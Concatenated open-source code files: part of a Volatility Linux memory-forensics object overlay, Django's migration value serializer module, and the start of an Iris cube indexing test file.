        ret = self.members.get("uid")
        if ret is None:
            ret = self.cred.uid
        else:
            ret = self.m("uid")
        return ret
    @property
    def gid(self):
        # Same old/new split as uid, with one extra wrinkle: a 'counter'
        # attribute presumably indicates a wrapped kgid_t whose value is a
        # pointer to the real int — TODO confirm against profile layouts.
        ret = self.members.get("gid")
        if ret is None:
            gid = self.cred.gid
            if hasattr(gid, 'counter'):
                ret = obj.Object("int", offset = gid.v(), vm = self.obj_vm)
            else:
                ret = gid
        else:
            ret = self.m("gid")
        return ret
    @property
    def euid(self):
        # Effective uid; same task-vs-cred layout split as uid.
        ret = self.members.get("euid")
        if ret is None:
            ret = self.cred.euid
        else:
            ret = self.m("euid")
        return ret
    def get_process_address_space(self):
        """Build an address space using this process's page directory."""
        ## If we've got a NoneObject, return it maintain the reason
        if self.mm.pgd.v() == None:
            return self.mm.pgd.v()
        # Translate the (virtual) pgd pointer into a physical DTB.
        directory_table_base = self.obj_vm.vtop(self.mm.pgd.v())
        try:
            process_as = self.obj_vm.__class__(
                self.obj_vm.base, self.obj_vm.get_config(), dtb = directory_table_base)
        except AssertionError, _e:
            return obj.NoneObject("Unable to get process AS")
        process_as.name = "Process {0}".format(self.pid)
        return process_as
    def get_proc_maps(self):
        """Yield each vm_area_struct mapped by this process."""
        for vma in linux_common.walk_internal_list("vm_area_struct", "vm_next", self.mm.mmap):
            yield vma
    def search_process_memory(self, s, heap_only = False):
        """Yield the address of every hit for the strings in `s` within
        this process's mapped memory (optionally restricted to the heap)."""
        # Allow for some overlap in case objects are
        # right on page boundaries
        overlap = 1024
        # Make sure s in a list. This allows you to search for
        # multiple strings at once, without changing the API.
        if type(s) != list:
            debug.warning("Single strings to search_process_memory is deprecated, use a list instead")
            s = [s]
        # Scan in 10 MB chunks to bound memory usage.
        scan_blk_sz = 1024 * 1024 * 10
        addr_space = self.get_process_address_space()
        for vma in self.get_proc_maps():
            if heap_only:
                # Keep only the VMA containing [start_brk, brk].
                if not (vma.vm_start <= self.mm.start_brk and vma.vm_end >= self.mm.brk):
                    continue
            offset = vma.vm_start
            out_of_range = vma.vm_start + (vma.vm_end - vma.vm_start)
            while offset < out_of_range:
                # Read some data and match it.
                to_read = min(scan_blk_sz + overlap, out_of_range - offset)
                data = addr_space.zread(offset, to_read)
                if not data:
                    break
                for x in s:
                    for hit in utils.iterfind(data, x):
                        yield offset + hit
                # Advance by the block size only, so the `overlap` bytes
                # are re-scanned at the next chunk boundary.
                offset += min(to_read, scan_blk_sz)
    def ACTHZ(self, CLOCK_TICK_RATE, HZ):
        # Mirrors the kernel's ACTHZ macro (actual timer frequency).
        LATCH = ((CLOCK_TICK_RATE + HZ/2) / HZ)
        return self.SH_DIV(CLOCK_TICK_RATE, LATCH, 8)
    def SH_DIV(self, NOM, DEN, LSH):
        # Kernel SH_DIV macro: fixed-point divide with rounding.
        # Relies on Python 2 integer division throughout.
        return ((NOM / DEN) << LSH) + (((NOM % DEN) << LSH) + DEN / 2) / DEN
    def TICK_NSEC(self):
        # Nanoseconds per timer tick, mirroring the kernel's constants.
        HZ = 1000
        CLOCK_TICK_RATE = 1193182
        return self.SH_DIV(1000000 * 1000, self.ACTHZ(CLOCK_TICK_RATE, HZ), 8)
    def get_time_vars(self):
        '''
        Sometime in 3.[3-5], Linux switched to a global timekeeper structure
        This just figures out which is in use and returns the correct variables
        '''
        wall_addr = self.obj_vm.profile.get_symbol("wall_to_monotonic")
        sleep_addr = self.obj_vm.profile.get_symbol("total_sleep_time")
        # old way
        if wall_addr and sleep_addr:
            wall = obj.Object("timespec", offset = wall_addr, vm = self.obj_vm)
            timeo = obj.Object("timespec", offset = sleep_addr, vm = self.obj_vm)
        elif wall_addr:
            # Middle-era kernels: no total_sleep_time symbol, so derive a
            # sleep figure from init_task's accumulated cpu time.
            wall = obj.Object("timespec", offset = wall_addr, vm = self.obj_vm)
            init_task_addr = self.obj_vm.profile.get_symbol("init_task")
            init_task = obj.Object("task_struct", offset = init_task_addr, vm = self.obj_vm)
            time_val = init_task.utime + init_task.stime
            nsec = time_val * self.TICK_NSEC()
            tv_sec = nsec / linux_common.nsecs_per
            tv_nsec = nsec % linux_common.nsecs_per
            timeo = linux_common.vol_timespec(tv_sec, tv_nsec)
        # timekeeper way
        else:
            timekeeper_addr = self.obj_vm.profile.get_symbol("timekeeper")
            timekeeper = obj.Object("timekeeper", offset = timekeeper_addr, vm = self.obj_vm)
            wall = timekeeper.wall_to_monotonic
            timeo = timekeeper.total_sleep_time
        return (wall, timeo)
    # based on 2.6.35 getboottime
    def get_boot_time(self):
        """Reconstruct the wall-clock boot time in (fractional) seconds."""
        (wall, timeo) = self.get_time_vars()
        secs = wall.tv_sec + timeo.tv_sec
        nsecs = wall.tv_nsec + timeo.tv_nsec
        # wall_to_monotonic/total_sleep_time are negative offsets; negate.
        secs = secs * -1
        nsecs = nsecs * -1
        # Normalise nsecs into [0, nsecs_per).
        while nsecs >= linux_common.nsecs_per:
            nsecs = nsecs - linux_common.nsecs_per
            secs = secs + 1
        while nsecs < 0:
            nsecs = nsecs + linux_common.nsecs_per
            secs = secs - 1
        # NOTE(review): the extra '/ 100' looks odd for a nsec->sec
        # conversion; presumably deliberate here — confirm upstream.
        boot_time = secs + (nsecs / linux_common.nsecs_per / 100)
        return boot_time
    def get_task_start_time(self):
        """Return the task's start time as a UnixTimeStamp object."""
        start_time = self.start_time
        start_secs = start_time.tv_sec + (start_time.tv_nsec / linux_common.nsecs_per / 100)
        sec = self.get_boot_time() + start_secs
        # convert the integer as little endian
        try:
            data = struct.pack("<I", sec)
        except struct.error:
            # in case we exceed 0 <= number <= 4294967295
            return ""
        bufferas = addrspace.BufferAddressSpace(self.obj_vm.get_config(), data = data)
        dt = obj.Object("UnixTimeStamp", offset = 0, vm = bufferas, is_utc = True)
        return dt
    def get_commandline(self):
        """Return the process command line, or "[comm]" for kernel threads."""
        if self.mm:
            # set the as with our new dtb so we can read from userland
            proc_as = self.get_process_address_space()
            # read argv from userland
            start = self.mm.arg_start.v()
            argv = proc_as.read(start, self.mm.arg_end - self.mm.arg_start)
            if argv:
                # split the \x00 buffer into args
                name = " ".join(argv.split("\x00"))
            else:
                name = ""
        else:
            # kernel thread
            name = "[" + self.comm + "]"
        return name
class linux_fs_struct(obj.CType):
    """Wrapper for 'struct fs_struct' across layout changes."""

    def get_root_dentry(self):
        # < 2.6.26: 'root' is the dentry itself; later kernels embed a
        # path struct, so the dentry hangs off root.dentry.
        if hasattr(self, "rootmnt"):
            return self.root
        return self.root.dentry

    def get_root_mnt(self):
        # < 2.6.26: the mount lives in a separate 'rootmnt' member;
        # later kernels fold it into the embedded path struct.
        if hasattr(self, "rootmnt"):
            return self.rootmnt
        return self.root.mnt
class super_block(obj.CType):
    """Wrapper for 'struct super_block'."""

    @property
    def major(self):
        # Device major number: the bits above the 20-bit minor field.
        return self.s_dev >> 20

    @property
    def minor(self):
        # Device minor number: the low 20 bits of s_dev.
        return self.s_dev & 0xfffff
class inode(obj.CType):
    """Wrapper for 'struct inode'."""

    def is_dir(self):
        """Mimic the S_ISDIR macro"""
        return (self.i_mode & linux_flags.S_IFMT) == linux_flags.S_IFDIR

    def is_reg(self):
        """Mimic the S_ISREG macro"""
        return (self.i_mode & linux_flags.S_IFMT) == linux_flags.S_IFREG
class timespec(obj.CType):
    """Wrapper for 'struct timespec'."""

    def as_timestamp(self):
        """Convert tv_sec into a UnixTimeStamp object (UTC)."""
        # Pack the seconds value little-endian and parse it back through
        # a buffer address space as a UnixTimeStamp.
        packed = struct.pack("<I", self.tv_sec)
        buffer_as = addrspace.BufferAddressSpace(self.obj_vm.get_config(), data = packed)
        return obj.Object("UnixTimeStamp", offset = 0, vm = buffer_as, is_utc = True)
class dentry(obj.CType):
    """Wrapper for 'struct dentry'."""

    def get_partial_path(self):
        """ we can't get the full path b/c we
        do not have a ref to the vfsmnt """
        components = []
        node = self
        # Walk towards the root; the root dentry is its own parent.
        while node and node != node.d_parent:
            name = node.d_name.name.dereference_as("String", length = 255)
            if name.is_valid():
                components.append(str(name))
            node = node.d_parent
        # Collected leaf-first, so reverse before joining.
        components.reverse()
        return "/".join(components)
class VolatilityDTB(obj.VolatilityMagic):
    """A scanner for DTB values."""

    def generate_suggestions(self):
        """Tries to locate the DTB."""
        # 32-bit x86 kernel virtual addresses are offset by PAGE_OFFSET.
        kernel_shift = 0xc0000000
        # this is the only code allowed to reference the internal sys_map!
        yield self.obj_vm.profile.get_symbol("swapper_pg_dir") - kernel_shift
# the intel check, simply checks for the static paging of init_task
class VolatilityLinuxIntelValidAS(obj.VolatilityMagic):
    """An object to check that an address space is a valid Arm Paged space"""

    def generate_suggestions(self):
        init_task_addr = self.obj_vm.profile.get_symbol("init_task")
        # Kernel image shift depends on the memory model.
        is_32bit = self.obj_vm.profile.metadata.get('memory_model', '32bit') == "32bit"
        shift = 0xc0000000 if is_32bit else 0xffffffff80000000
        # init_task is statically mapped, so a correct DTB translates its
        # virtual address exactly onto the shifted physical address.
        yield self.obj_vm.vtop(init_task_addr) == init_task_addr - shift
# the ARM check, has to check multiple values b/c phones do not map RAM at 0
class VolatilityLinuxARMValidAS(obj.VolatilityMagic):
    """An object to check that an address space is a valid Arm Paged space"""

    def generate_suggestions(self):
        init_task_addr = self.obj_vm.profile.get_symbol("init_task")
        do_fork_addr = self.obj_vm.profile.get_symbol("do_fork")
        sym_addr_diff = (do_fork_addr - init_task_addr)
        is_32bit = self.obj_vm.profile.metadata.get('memory_model', '32bit') == "32bit"
        shift = 0xc0000000 if is_32bit else 0xffffffff80000000
        task_paddr = self.obj_vm.vtop(init_task_addr)
        fork_paddr = self.obj_vm.vtop(do_fork_addr)
        if task_paddr and fork_paddr:
            # these won't be zero due to RAM not at physical address 0
            # but if the offset from 0 is the same across two paging operations
            # then we have the right DTB
            yield (fork_paddr - shift) - (task_paddr - shift) == sym_addr_diff
class LinuxObjectClasses(obj.ProfileModification):
    # Registers the wrapper classes defined above for every Linux profile.
    conditions = {'os': lambda x: x == 'linux'}
    before = ['BasicObjectClasses']
    def modification(self, profile):
        # Map vtype names to the Python classes that wrap them.
        profile.object_classes.update({
            'fs_struct': linux_fs_struct,
            'file': linux_file,
            'list_head': list_head,
            'hlist_node': hlist_node,
            'files_struct': files_struct,
            'task_struct': task_struct,
            'net_device' : net_device,
            'in_device' : in_device,
            'tty_ldisc' : tty_ldisc,
            'module_sect_attr' : module_sect_attr,
            'VolatilityDTB': VolatilityDTB,
            'IpAddress': basic.IpAddress,
            'Ipv6Address': basic.Ipv6Address,
            'VolatilityLinuxIntelValidAS' : VolatilityLinuxIntelValidAS,
            'VolatilityLinuxARMValidAS' : VolatilityLinuxARMValidAS,
            'kernel_param' : kernel_param,
            'kparam_array' : kparam_array,
            'gate_struct64' : gate_struct64,
            'desc_struct' : desc_struct,
            'page': page,
            'LinuxPermissionFlags': LinuxPermissionFlags,
            'super_block' : super_block,
            'inode' : inode,
            'dentry' : dentry,
            'timespec' : timespec,
            'inet_sock' : inet_sock,
            })
class LinuxOverlay(obj.ProfileModification):
    # Merges the generic Linux vtype overlay into every Linux profile.
    conditions = {'os': lambda x: x == 'linux'}
    before = ['BasicObjectClasses'] # , 'LinuxVTypes']
    def modification(self, profile):
        profile.merge_overlay(linux_overlay)
class LinuxIntelOverlay(obj.ProfileModification):
    # Merges the Intel-specific overlay for x86/x64 Linux profiles only.
    conditions = {'os': lambda x: x == 'linux',
                  'arch' : lambda x: x == 'x86' or x == 'x64'}
    before = ['BasicObjectClasses'] # , 'LinuxVTypes']
    def modification(self, profile):
        profile.merge_overlay(intel_overlay)
class page(obj.CType):
    # Wrapper for 'struct page' entries in the kernel page-frame database.
    def to_vaddr(self):
        #FIXME Do it!
        pass
    def to_paddr(self):
        """Compute the physical address this page struct describes."""
        mem_map_addr = self.obj_vm.profile.get_symbol("mem_map")
        mem_section_addr = self.obj_vm.profile.get_symbol("mem_section")
        if mem_map_addr:
            # FLATMEM kernels, usually 32 bit
            mem_map_ptr = obj.Object("Pointer", offset = mem_map_addr, vm = self.obj_vm, parent = self.obj_parent)
        elif mem_section_addr:
            # this is hardcoded in the kernel - VMEMMAPSTART, usually 64 bit kernels
            mem_map_ptr = 0xffffea0000000000
        else:
            debug.error("phys_addr_of_page: Unable to determine physical address of page. NUMA is not supported at this time.\n")
        # Index of this struct within the page array (Python 2 integer
        # division), i.e. the page frame number...
        phys_offset = (self.obj_offset - mem_map_ptr) / self.obj_vm.profile.get_obj_size("page")
        # ...then shift by 12 to convert a PFN into a byte address
        # (assumes 4 KB pages).
        phys_offset = phys_offset << 12
        return phys_offset
class mount(obj.CType):
    """Wrapper handling kernels where vfsmount fields moved into
    'struct mount' (which embeds a vfsmount as 'mnt')."""

    # NOTE(review): the fall-through branches below re-read the property's
    # own name, exactly as the original did — presumably only reachable on
    # layouts where CType resolves the raw member first; confirm.

    @property
    def mnt_sb(self):
        return self.mnt.mnt_sb if hasattr(self, "mnt") else self.mnt_sb

    @property
    def mnt_root(self):
        return self.mnt.mnt_root if hasattr(self, "mnt") else self.mnt_root

    @property
    def mnt_flags(self):
        return self.mnt.mnt_flags if hasattr(self, "mnt") else self.mnt_flags
class vfsmount(obj.CType):
    """Wrapper for 'struct vfsmount' across the struct-mount split."""

    def _get_real_mnt(self):
        """container_of(): recover the enclosing 'struct mount'."""
        mnt_offset = self.obj_vm.profile.get_obj_offset("mount", "mnt")
        return obj.Object("mount", offset = self.obj_offset - mnt_offset, vm = self.obj_vm)

    @property
    def mnt_parent(self):
        # Old kernels keep the member here; new ones moved it to mount.
        if self.members.get("mnt_parent") is None:
            return self._get_real_mnt().mnt_parent
        return self.m("mnt_parent")

    @property
    def mnt_mountpoint(self):
        # Same old/new layout split as mnt_parent.
        if self.members.get("mnt_mountpoint") is None:
            return self._get_real_mnt().mnt_mountpoint
        return self.m("mnt_mountpoint")
class LinuxMountOverlay(obj.ProfileModification):
    # Registers mount/vfsmount wrappers only when the profile defines a
    # 'mount' vtype (newer kernels that split struct mount out of
    # vfsmount — presumably; confirm against profile generation).
    conditions = {'os': lambda x: x == 'linux'}
    before = ['BasicObjectClasses'] # , 'LinuxVTypes']
    def modification(self, profile):
        if profile.vtypes.get("mount"):
            profile.object_classes.update({'mount' : mount, 'vfsmount' : vfsmount})
| gpl-2.0 |
bak1an/django | django/db/migrations/serializer.py | 18 | 13453 | import builtins
import collections
import datetime
import decimal
import enum
import functools
import math
import re
import types
import uuid
from django.db import models
from django.db.migrations.operations.base import Operation
from django.db.migrations.utils import COMPILED_REGEX_TYPE, RegexObject
from django.utils import datetime_safe
from django.utils.encoding import force_text
from django.utils.functional import LazyObject, Promise
from django.utils.timezone import utc
from django.utils.version import get_docs_version
class BaseSerializer:
    """Common interface for migration value serializers.

    Subclasses implement serialize(), returning a (source-text, imports)
    pair for the wrapped value.
    """

    def __init__(self, value):
        self.value = value

    def serialize(self):
        raise NotImplementedError('Subclasses of BaseSerializer must implement the serialize() method.')
class BaseSequenceSerializer(BaseSerializer):
    """Shared logic for serializing sequence-like containers."""

    def _format(self):
        raise NotImplementedError('Subclasses of BaseSequenceSerializer must implement the _format() method.')

    def serialize(self):
        imports = set()
        parts = []
        # Serialize each element, accumulating its required imports.
        for element in self.value:
            element_string, element_imports = serializer_factory(element).serialize()
            imports.update(element_imports)
            parts.append(element_string)
        return self._format() % (", ".join(parts)), imports
class BaseSimpleSerializer(BaseSerializer):
    """Serialize values whose repr() is a valid, import-free literal."""

    def serialize(self):
        rendered = repr(self.value)
        return rendered, set()
class ByteTypeSerializer(BaseSerializer):
    """Serialize bytes values via their literal repr()."""

    def serialize(self):
        rendered = repr(self.value)
        return rendered, set()
class DatetimeSerializer(BaseSerializer):
    # Serializes datetime.datetime values (naive or aware) as repr() text.
    def serialize(self):
        # Normalise any aware, non-UTC value to UTC first so the repr is
        # stable and only ever mentions the importable 'utc' name.
        if self.value.tzinfo is not None and self.value.tzinfo != utc:
            self.value = self.value.astimezone(utc)
        # repr() spells the tzinfo object as "<UTC>"; swap in the name
        # provided by the django.utils.timezone import below.
        value_repr = repr(self.value).replace("<UTC>", "utc")
        # datetime_safe reprs omit the module prefix; add it back.
        if isinstance(self.value, datetime_safe.datetime):
            value_repr = "datetime.%s" % value_repr
        imports = ["import datetime"]
        if self.value.tzinfo is not None:
            imports.append("from django.utils.timezone import utc")
        return value_repr, set(imports)
class DateSerializer(BaseSerializer):
    """Serialize datetime.date values via repr()."""

    def serialize(self):
        rendered = repr(self.value)
        # datetime_safe reprs omit the module prefix; add it back.
        if isinstance(self.value, datetime_safe.date):
            rendered = "datetime.%s" % rendered
        return rendered, {"import datetime"}
class DecimalSerializer(BaseSerializer):
    """Serialize decimal.Decimal values via repr()."""

    def serialize(self):
        rendered = repr(self.value)
        return rendered, {"from decimal import Decimal"}
class DeconstructableSerializer(BaseSerializer):
    """Serialize any object exposing the deconstruct() protocol."""

    @staticmethod
    def serialize_deconstructed(path, args, kwargs):
        """Render ``path(*args, **kwargs)`` as source text plus imports."""
        name, imports = DeconstructableSerializer._serialize_path(path)
        rendered = []
        for arg in args:
            arg_string, arg_imports = serializer_factory(arg).serialize()
            rendered.append(arg_string)
            imports.update(arg_imports)
        # Sort keyword arguments for deterministic output.
        for kw, arg in sorted(kwargs.items()):
            arg_string, arg_imports = serializer_factory(arg).serialize()
            imports.update(arg_imports)
            rendered.append("%s=%s" % (kw, arg_string))
        return "%s(%s)" % (name, ", ".join(rendered)), imports

    @staticmethod
    def _serialize_path(path):
        """Split a dotted path into (usable name, required imports)."""
        module, name = path.rsplit(".", 1)
        # Model internals get the conventional short "models.X" spelling.
        if module == "django.db.models":
            return "models.%s" % name, {"from django.db import models"}
        return path, {"import %s" % module}

    def serialize(self):
        return self.serialize_deconstructed(*self.value.deconstruct())
class DictionarySerializer(BaseSerializer):
    """Serialize dicts, with keys sorted for deterministic output."""

    def serialize(self):
        imports = set()
        pairs = []
        for key, val in sorted(self.value.items()):
            key_string, key_imports = serializer_factory(key).serialize()
            val_string, val_imports = serializer_factory(val).serialize()
            imports.update(key_imports)
            imports.update(val_imports)
            pairs.append("%s: %s" % (key_string, val_string))
        return "{%s}" % (", ".join(pairs)), imports
class EnumSerializer(BaseSerializer):
    """Serialize enum members as module.EnumClass(value) calls."""

    def serialize(self):
        enum_class = type(self.value)
        module = enum_class.__module__
        # The member's underlying value is serialized recursively.
        value_string, value_imports = serializer_factory(self.value.value).serialize()
        imports = {"import %s" % module} | set(value_imports)
        return "%s.%s(%s)" % (module, enum_class.__name__, value_string), imports
class FloatSerializer(BaseSimpleSerializer):
    """Serialize floats, including the literal-less nan/inf values."""

    def serialize(self):
        # nan/inf have no literal form; construct them via float("...").
        if math.isinf(self.value) or math.isnan(self.value):
            return 'float("{}")'.format(self.value), set()
        return super().serialize()
class FrozensetSerializer(BaseSequenceSerializer):
    # Frozensets serialize via the frozenset([...]) constructor form.
    def _format(self):
        # %s is filled with the comma-joined element expressions.
        return "frozenset([%s])"
class FunctionTypeSerializer(BaseSerializer):
    # Serializes plain functions and class-bound methods by dotted path.
    def serialize(self):
        # Methods bound to a class (classmethods) render as
        # "module.Class.method".
        if getattr(self.value, "__self__", None) and isinstance(self.value.__self__, type):
            klass = self.value.__self__
            module = klass.__module__
            return "%s.%s.%s" % (module, klass.__name__, self.value.__name__), {"import %s" % module}
        # Further error checking
        if self.value.__name__ == '<lambda>':
            raise ValueError("Cannot serialize function: lambda")
        if self.value.__module__ is None:
            raise ValueError("Cannot serialize function %r: No module" % self.value)
        module_name = self.value.__module__
        # A '<' in the qualname means the function is nested (e.g. inside
        # <locals>) and therefore unreachable by dotted import path.
        if '<' not in self.value.__qualname__:  # Qualname can include <locals>
            return '%s.%s' % (module_name, self.value.__qualname__), {'import %s' % self.value.__module__}
        raise ValueError(
            'Could not find function %s in %s.\n' % (self.value.__name__, module_name)
        )
class FunctoolsPartialSerializer(BaseSerializer):
    """Serialize functools.partial objects."""

    def serialize(self):
        # Serialize functools.partial() arguments
        func_string, func_imports = serializer_factory(self.value.func).serialize()
        args_string, args_imports = serializer_factory(self.value.args).serialize()
        keywords_string, keywords_imports = serializer_factory(self.value.keywords).serialize()
        # Add any imports needed by arguments
        imports = {'import functools'}
        imports.update(func_imports)
        imports.update(args_imports)
        imports.update(keywords_imports)
        rendered = "functools.partial(%s, *%s, **%s)" % (
            func_string, args_string, keywords_string,
        )
        return rendered, imports
class IterableSerializer(BaseSerializer):
    """Serialize arbitrary iterables as tuple literals."""

    def serialize(self):
        imports = set()
        parts = []
        for element in self.value:
            element_string, element_imports = serializer_factory(element).serialize()
            imports.update(element_imports)
            parts.append(element_string)
        # A one-element tuple needs its trailing comma; the empty case is
        # fine as "()" — "(,)" would be invalid Python syntax.
        template = "(%s,)" if len(parts) == 1 else "(%s)"
        return template % (", ".join(parts)), imports
class ModelFieldSerializer(DeconstructableSerializer):
    """Serialize model field instances via their deconstruction."""

    def serialize(self):
        # The attribute name is irrelevant here; only the dotted path and
        # constructor arguments matter.
        _, path, args, kwargs = self.value.deconstruct()
        return self.serialize_deconstructed(path, args, kwargs)
class ModelManagerSerializer(DeconstructableSerializer):
    """Serialize model manager instances."""

    def serialize(self):
        as_manager, manager_path, qs_path, args, kwargs = self.value.deconstruct()
        if not as_manager:
            return self.serialize_deconstructed(manager_path, args, kwargs)
        # Managers created from a queryset render as QuerySet.as_manager().
        name, imports = self._serialize_path(qs_path)
        return "%s.as_manager()" % name, imports
class OperationSerializer(BaseSerializer):
    # Delegates migration operations to OperationWriter, which knows
    # how to render them with correct indentation.
    def serialize(self):
        # Deferred import to avoid a circular dependency with the writer.
        from django.db.migrations.writer import OperationWriter
        string, imports = OperationWriter(self.value, indentation=0).serialize()
        # Nested operation, trailing comma is handled in upper OperationWriter._write()
        return string.rstrip(','), imports
class RegexSerializer(BaseSerializer):
    """Serialize compiled regexes as re.compile(...) calls."""

    def serialize(self):
        pattern_string, pattern_imports = serializer_factory(self.value.pattern).serialize()
        # Turn off default implicit flags (e.g. re.U) because regexes with the
        # same implicit and explicit flags aren't equal.
        flags = self.value.flags ^ re.compile('').flags
        flags_string, flag_imports = serializer_factory(flags).serialize()
        imports = {"import re"} | set(pattern_imports) | set(flag_imports)
        call_args = [pattern_string]
        if flags:
            call_args.append(flags_string)
        return "re.compile(%s)" % ', '.join(call_args), imports
class SequenceSerializer(BaseSequenceSerializer):
    # Lists serialize with list-literal syntax.
    def _format(self):
        # %s is filled with the comma-joined element expressions.
        return "[%s]"
class SetSerializer(BaseSequenceSerializer):
    # Sets serialize via the set([...]) constructor form.
    def _format(self):
        # Don't use the literal "{%s}" as it doesn't support empty set
        return "set([%s])"
class SettingsReferenceSerializer(BaseSerializer):
    """Serialize references to django.conf settings by name."""

    def serialize(self):
        rendered = "settings.%s" % self.value.setting_name
        return rendered, {"from django.conf import settings"}
class TextTypeSerializer(BaseSerializer):
    """Serialize str values via their literal repr()."""

    def serialize(self):
        rendered = repr(self.value)
        return rendered, set()
class TimedeltaSerializer(BaseSerializer):
    """Serialize datetime.timedelta values via repr()."""

    def serialize(self):
        rendered = repr(self.value)
        return rendered, {"import datetime"}
class TimeSerializer(BaseSerializer):
    """Serialize datetime.time values via repr()."""

    def serialize(self):
        rendered = repr(self.value)
        # datetime_safe reprs omit the module prefix; add it back.
        if isinstance(self.value, datetime_safe.time):
            rendered = "datetime.%s" % rendered
        return rendered, {"import datetime"}
class TupleSerializer(BaseSequenceSerializer):
    """Serialize tuples with valid literal syntax."""

    def _format(self):
        # A single-element tuple needs its trailing comma; "()" is fine
        # when empty, whereas "(,)" would be invalid Python syntax.
        if len(self.value) == 1:
            return "(%s,)"
        return "(%s)"
class TypeSerializer(BaseSerializer):
    """Serialize class objects themselves (not instances)."""

    def serialize(self):
        special_cases = [
            (models.Model, "models.Model", []),
        ]
        for case, string, imports in special_cases:
            if case is self.value:
                return string, set(imports)
        if hasattr(self.value, "__module__"):
            module = self.value.__module__
            # Builtins need no qualification or import.
            if module == builtins.__name__:
                return self.value.__name__, set()
            return "%s.%s" % (module, self.value.__name__), {"import %s" % module}
        # NOTE(review): falls through (returning None) for objects lacking
        # __module__ — presumably unreachable in practice; confirm.
class UUIDSerializer(BaseSerializer):
    """Serialize uuid.UUID values via repr()."""

    def serialize(self):
        rendered = "uuid.%s" % repr(self.value)
        return rendered, {"import uuid"}
def serializer_factory(value):
    """Return a serializer instance appropriate for ``value``.

    The isinstance() checks are order-dependent: subclasses must be
    tested before their bases (e.g. bool before int, datetime.datetime
    before datetime.date), and the deconstruct() protocol wins over
    generic container handling.
    """
    # Imported here to avoid a circular import with the migration writer.
    from django.db.migrations.writer import SettingsReference
    if isinstance(value, Promise):
        value = force_text(value)
    elif isinstance(value, LazyObject):
        # The unwrapped value is returned as the first item of the arguments
        # tuple.
        value = value.__reduce__()[1][0]
    if isinstance(value, models.Field):
        return ModelFieldSerializer(value)
    if isinstance(value, models.manager.BaseManager):
        return ModelManagerSerializer(value)
    if isinstance(value, Operation):
        return OperationSerializer(value)
    if isinstance(value, type):
        return TypeSerializer(value)
    # Anything that knows how to deconstruct itself.
    if hasattr(value, 'deconstruct'):
        return DeconstructableSerializer(value)
    # Unfortunately some of these are order-dependent.
    if isinstance(value, frozenset):
        return FrozensetSerializer(value)
    if isinstance(value, list):
        return SequenceSerializer(value)
    if isinstance(value, set):
        return SetSerializer(value)
    if isinstance(value, tuple):
        return TupleSerializer(value)
    if isinstance(value, dict):
        return DictionarySerializer(value)
    if isinstance(value, enum.Enum):
        return EnumSerializer(value)
    if isinstance(value, datetime.datetime):
        return DatetimeSerializer(value)
    if isinstance(value, datetime.date):
        return DateSerializer(value)
    if isinstance(value, datetime.time):
        return TimeSerializer(value)
    if isinstance(value, datetime.timedelta):
        return TimedeltaSerializer(value)
    if isinstance(value, SettingsReference):
        return SettingsReferenceSerializer(value)
    if isinstance(value, float):
        return FloatSerializer(value)
    if isinstance(value, (bool, int, type(None))):
        return BaseSimpleSerializer(value)
    if isinstance(value, bytes):
        return ByteTypeSerializer(value)
    if isinstance(value, str):
        return TextTypeSerializer(value)
    if isinstance(value, decimal.Decimal):
        return DecimalSerializer(value)
    if isinstance(value, functools.partial):
        return FunctoolsPartialSerializer(value)
    if isinstance(value, (types.FunctionType, types.BuiltinFunctionType, types.MethodType)):
        return FunctionTypeSerializer(value)
    # collections.Iterable is a deprecated alias removed in Python 3.10;
    # collections.abc.Iterable is the supported spelling (since 3.3).
    if isinstance(value, collections.abc.Iterable):
        return IterableSerializer(value)
    if isinstance(value, (COMPILED_REGEX_TYPE, RegexObject)):
        return RegexSerializer(value)
    if isinstance(value, uuid.UUID):
        return UUIDSerializer(value)
    raise ValueError(
        "Cannot serialize: %r\nThere are some values Django cannot serialize into "
        "migration files.\nFor more, see https://docs.djangoproject.com/en/%s/"
        "topics/migrations/#migration-serializing" % (value, get_docs_version())
    )
| bsd-3-clause |
marqh/iris | lib/iris/tests/test_cdm.py | 3 | 51630 | # (C) British Crown Copyright 2010 - 2017, Met Office
#
# This file is part of Iris.
#
# Iris is free software: you can redistribute it and/or modify it under
# the terms of the GNU Lesser General Public License as published by the
# Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Iris is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Iris. If not, see <http://www.gnu.org/licenses/>.
"""
Test cube indexing, slicing, and extracting, and also the dot graphs.
"""
from __future__ import (absolute_import, division, print_function)
from six.moves import (filter, input, map, range, zip) # noqa
import six
# import iris tests first so that some things can be initialised before importing anything else
import iris.tests as tests
from contextlib import contextmanager
import os
import re
import sys
import unittest
import cf_units
import numpy as np
import numpy.ma as ma
import iris
import iris.analysis
import iris.coords
import iris.cube
import iris.fileformats
import iris.fileformats.dot
import iris.tests.pp as pp
import iris.tests.stock
class IrisDotTest(tests.IrisTest):
    def check_dot(self, cube, reference_filename):
        """Compare the DOT text for `cube` against a reference file,
        creating the reference file on the first run."""
        test_string = iris.fileformats.dot.cube_text(cube)
        reference_path = tests.get_result_path(reference_filename)
        if os.path.isfile(reference_path):
            with open(reference_path, 'r') as reference_fh:
                # read() fetches the whole file in one pass; the original
                # ''.join(readlines()) built a throwaway list first.
                reference = reference_fh.read()
            self._assert_str_same(reference, test_string, reference_filename, type_comparison_name='DOT files')
        else:
            with open(reference_path, 'w') as reference_fh:
                # write() emits the string in one call; writelines() on a
                # str iterated it character by character (same output,
                # needlessly slow).
                reference_fh.write(test_string)
class TestBasicCubeConstruction(tests.IrisTest):
    # Exercises manual cube construction and coordinate attachment rules.
    def setUp(self):
        # 3x4 int32 payload; 'y' matches dim 0 (len 3), 'x' matches dim 1
        # (len 4), and 'xy' is a 2D auxiliary coord spanning both dims.
        self.cube = iris.cube.Cube(np.arange(12, dtype=np.int32).reshape((3, 4)), long_name='test cube')
        self.x = iris.coords.DimCoord(np.array([ -7.5, 7.5, 22.5, 37.5]), long_name='x')
        self.y = iris.coords.DimCoord(np.array([ 2.5, 7.5, 12.5]), long_name='y')
        self.xy = iris.coords.AuxCoord(np.arange(12).reshape((3, 4)) * 3.0, long_name='xy')
    def test_add_dim_coord(self):
        """Validation and bookkeeping when attaching dimension coords."""
        # Lengths must match
        with self.assertRaises(ValueError):
            self.cube.add_dim_coord(self.y, 1)
        with self.assertRaises(ValueError):
            self.cube.add_dim_coord(self.x, 0)
        # Must specify a dimension
        with self.assertRaises(TypeError):
            self.cube.add_dim_coord(self.y)
        # Add y
        self.cube.add_dim_coord(self.y, 0)
